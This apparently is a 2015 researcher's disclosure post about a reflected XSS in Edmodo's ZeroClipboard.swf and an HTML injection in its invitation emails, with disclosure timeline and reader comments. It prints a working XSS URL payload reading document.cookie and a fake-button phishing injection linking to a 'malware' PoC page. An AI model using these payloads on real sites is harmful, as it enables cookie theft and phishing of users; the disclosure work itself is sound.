For those who don’t know Edmodo…
The safest and easiest way for educators to connect and collaborate with students, parents, and each other.
They count with 59,411,899 members. Huge number.
I decided to help them providing them with two security issues. A Reflected XSS and a HTML Injection.
#1 Reflected XSS
After registering in Edmodo I noticed a request to ZeroClipboard.swf on my Google Inspector.
I know that older versions of this SWF have a XSS vulnerability so I gave it a try:
[code lang=”html”]
https://www.edmodo.com/bin/ZeroClipboard.swf?id=\%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
[/code]
Guess what? It was vulnerable version. It worked perfecly and my cookie was shown in a Javascript alert box.
#2 HTML Injection on Create Invites
This was interesting and I already found similar issues on many websites.
Using the invitee_first_name field you could inject HTML to trick the victim [invitee_email].
Take for example this proof-of-concept:
[code lang=”html”]
Ze<br /><a href="http://www.davidsopas.com/poc/malware.htm" style="font-size:14px;text-decoration:none;margin:0 auto;background:#69a229;color:white;font-weight:400;border:1px solid #457a04;border-radius:4px;display:inline-block" target="_blank"><span style="display:inline-block;padding:10px 34px">Accept Invitation and Win a Bonus</span></a>
[/code]
When sending a reminder you could also use the same technique:
[code lang=”html”]
<br /><a href="http://www.davidsopas.com/poc/malware.htm" style="font-size:14px;text-decoration:none;margin:0 auto;background:#69a229;color:white;font-weight:400;border:1px solid #457a04;border-radius:4px;display:inline-block" target="_blank"><span style="display:inline-block;padding:10px 34px">Accept Invitation and Win a Bonus</span></a>
[/code]
This would reflect on the victims email. I used the same style of a existing Edmodo button. When the victim clicked, it goes to my proof-of-concept page.
Possible attack scenario:
- Malicious user sends invitations with a HTML injection [like my proof-of-concept]
- Victim thinks that’s a button from Edmodo and clicks on it.
- Victims browser gets hijacked
Edmodo guys were awesome, giving constantly updates on the report status. Also they sent me some goodies but European customs retain the package 🙂
Timeline:
13-10-2015 I sent a email request security contact
13-10-2015 Edmodo replied to the above question
13-10-2015 I sent the security report
22-10-2015 Edmodo replied that both issues were validated and they’re working on it
04-11-2015 Edmodo fixed both issues
06-11-2015 Full disclosure
thanks for the article,
where is invitee_first_name field and how did you injected? couln’t see
regards
In the textfield where you type that name of the user you want to invite for a group or something else.
Does Edmodo have a place to contact them about vulnerabilities? I’ve also found something and am wondering where to report it.
@Paltry_Digger – privacy at edmodo.com. Hope it helps!
Thanks! Just got my Edmodo mug and t-shirt for a stored XSS vulnerability 🙂
No worries. Edmodo are such cool guys 🙂